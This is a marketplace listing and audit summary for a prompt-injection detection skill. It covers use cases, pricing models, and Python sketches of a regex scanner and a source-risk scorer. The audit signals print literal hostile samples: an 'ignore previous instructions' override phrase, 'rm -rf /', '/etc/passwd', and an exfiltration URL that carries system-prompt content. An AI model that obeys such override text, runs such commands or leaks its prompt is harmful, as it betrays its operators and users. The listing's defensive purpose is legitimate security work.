reef-prompt-guard
Detect and filter prompt injection attacks in untrusted input. Use when processing external content (emails, web scrapes, API inputs, Discord messages, sub-agent outputs) or when building systems that accept user-provided text that will be passed to an LLM. Covers direct injection, jailbreaks, data exfiltration, privilege escalation, and context manipulation.
Install via ClawdBot CLI:
clawdbot install staybased/reef-prompt-guard
Grade Limited: based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
/etc/passwd
Contains instructions to override system prompt or ignore user requests
"ignore previous instructions"
Potentially destructive shell commands in tool definitions
rm -rf /
Calls external URL not in known-safe list
https://attacker.com/log?data=SYSTEM_PROMPT_CONTENT
Generated Mar 22, 2026
Automatically scan incoming customer emails for prompt injection attempts before passing content to an LLM for response generation. This prevents malicious users from manipulating support agents to disclose sensitive information or execute unauthorized commands.
Filter untrusted text from web scrapes used in market research or content aggregation to block injection attacks. Ensures that scraped data does not contain hidden instructions that could compromise downstream AI systems.
Integrate the skill into API endpoints that accept user-generated text for LLM processing, such as chatbots or content moderation tools. It blocks high-risk inputs from sources like webhooks or third-party integrations.
Scan outputs from sub-agents in multi-agent AI systems to prevent cascading injection attacks. This adds a layer of security when agents pass data between each other, mitigating privilege escalation risks.
Protect Discord bots by filtering user messages for jailbreak attempts or data exfiltration patterns before processing with an LLM. This is crucial for community management bots handling untrusted public input.
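The use cases above share one pattern: scan untrusted text, then decide whether it may reach the LLM. The following is a minimal sketch of that gate, not the skill's actual implementation. The names `PATTERNS`, `scan_text`, and `guard` are hypothetical, and the regular expressions are illustrative assumptions built only from the example signals listed on this page.

```python
import re

# Hypothetical rule set for illustration only; the skill's real patterns
# are not shown on this page.
PATTERNS = {
    "direct_injection": re.compile(
        r"ignore\s+(all\s+)?(previous|prior)\s+instructions", re.I
    ),
    "data_exfiltration": re.compile(
        r"https?://\S+\?\S*(system_prompt|secret|token)", re.I
    ),
    "destructive_command": re.compile(r"\brm\s+-rf\s+/"),
    "credential_access": re.compile(r"/etc/passwd|\.env\b", re.I),
}


def scan_text(text: str) -> list[str]:
    """Return the names of every pattern category that matches the text."""
    return [name for name, pattern in PATTERNS.items() if pattern.search(text)]


def guard(text: str) -> str:
    """Return the text unchanged if it is clean; raise if any pattern matches."""
    hits = scan_text(text)
    if hits:
        raise ValueError(f"blocked: {', '.join(hits)}")
    return text
```

A caller would wrap each untrusted input, for example `prompt = guard(email_body)`, and treat the `ValueError` as a signal to quarantine the message rather than forward it. Pattern matching of this kind catches only known phrasings, so it is best seen as one layer among several.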
Offer the prompt guard as a cloud API with tiered pricing based on usage volume. Provide real-time scanning for businesses integrating AI into their products, with premium support for custom threat patterns.
Sell on-premise licenses or custom integrations to large organizations needing to secure internal AI systems. Include consulting services for deployment, training, and ongoing pattern updates.
Release the core tool as open source to build community trust and adoption. Monetize through paid add-ons like advanced ML classifiers, priority pattern updates, and dedicated support channels.
💬 Integration Tip
Use the JSON mode for easy integration into existing workflows, and always apply context multipliers based on input source risk levels to enhance detection accuracy.
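To illustrate the tip, here is a rough sketch of how a source-based context multiplier might scale a detection score and how the result could be emitted as JSON. Everything in it is an assumption made for illustration: the multiplier values, the `BLOCK_THRESHOLD`, the field names, and the functions `score_input` and `to_json` are hypothetical and do not describe the skill's real output format.

```python
import json

# Hypothetical multipliers: riskier input sources scale the base score up.
SOURCE_MULTIPLIERS = {
    "internal": 0.5,
    "email": 1.0,
    "discord": 1.2,
    "web_scrape": 1.5,
}

# Hypothetical cutoff above which input is blocked.
BLOCK_THRESHOLD = 0.7


def score_input(base_score: float, source: str) -> dict:
    """Scale a base score in [0, 1] by the source's multiplier, capped at 1.0."""
    # Unknown sources get the highest multiplier as a conservative default.
    multiplier = SOURCE_MULTIPLIERS.get(source, 1.5)
    adjusted = min(1.0, base_score * multiplier)
    return {
        "source": source,
        "base_score": base_score,
        "multiplier": multiplier,
        "adjusted_score": round(adjusted, 3),
        "blocked": adjusted >= BLOCK_THRESHOLD,
    }


def to_json(result: dict) -> str:
    """Serialize a result with stable key order for downstream tools."""
    return json.dumps(result, sort_keys=True)
```

With these assumed values, the same base score of 0.5 is blocked when it comes from a web scrape (adjusted to 0.75) but allowed from an internal source (adjusted to 0.25), which is the effect the tip describes.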
Scored Apr 19, 2026
AI Analysis
This skill is a defensive security tool designed to detect and filter prompt injection attacks, not to perform malicious actions. It processes input locally to identify threats like jailbreaks and data exfiltration, and its documentation focuses on integration patterns for user protection. The rule-based signals found are examples of threats the skill is designed to detect, not actions the skill itself performs.
Audited Apr 16, 2026 · audit v1.0